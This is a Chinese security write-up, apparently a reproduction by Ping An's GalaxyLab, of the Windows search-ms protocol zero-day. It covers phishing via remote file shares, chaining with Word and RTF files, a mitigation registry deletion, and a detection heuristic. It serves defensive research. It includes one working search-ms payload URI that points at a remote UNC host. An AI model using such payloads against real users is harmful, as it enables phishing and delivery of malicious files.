继Windows漏洞CVE-2022-30190之后,安全研究人员发现了一个新的Windows Search零日漏洞。Windows的URI协议处理程序search-ms可以使用应用程序和HTML链接在设备上进行自定义搜索,该协议旨在促进使用本地设备索引的 Windows搜索,但攻击者可强制操作系统在远程主机上执行文件共享查询。利用该漏洞,攻击者可以在受害者主机自动打开一个搜索窗口,其中包含远程托管的恶意文件。攻击者对恶意文件进行伪装,并诱导用户进行执行。
另外,有安全研究员发现,将search-ms协议处理程序与另一个新发现的Office OLEObject漏洞相配合,可以让攻击者通过打开Word文档即启动自定义搜索窗口。甚至,攻击者可以创建富文本格式 (RTF) 文件,通过资源管理器中的预览选项卡自动启动自定义Windows搜索窗口,而无需打开钓鱼文档。
>>>> 0x01 漏洞利用
search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=ImportantUpdate
比如,对于示Payload中的测试托管网站live.sysinternals.com,Web网关会禁止部分路径访问。
寻找可出网域名搭建WebDAV服务,可确认该限制。
>>>> 0x02 漏洞缓解
该漏洞目前还处于0day状态,微软官方尚未发布安全补丁。但有缓解措施可防御攻击。
reg delete HKEY_CLASSES_ROOTsearch-ms /f
删除后再次利用,提示无法打开对应search-ms链接。
>>>> 0x03 漏洞检测
该漏洞利用过程中,如果用户点击执行了攻击者的钓鱼程序,explorer.exe进程将创建一个UNC路径的进程。该动作与主机正常程序执行明显不同,因此利用该特征进行检测。虽可能存在用户打开企业内部文件共享并执行的情况,但可通过添加排除项进行缓解。
![Windows Search Protocol漏洞复现]( "Windows Search Protocol漏洞复现")
银河实验室(GalaxyLab)是平安集团信息安全部下一个相对独立的安全实验室,主要从事安全技术研究和安全测试工作。团队内现在覆盖逆向、物联网、Web、Android、iOS、云平台区块链安全等多个安全方向。
官网:http://galaxylab.pingan.com.cn/
原文始发于微信公众号(平安集团安全应急响应中心):Windows Search Protocol漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/1248640.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论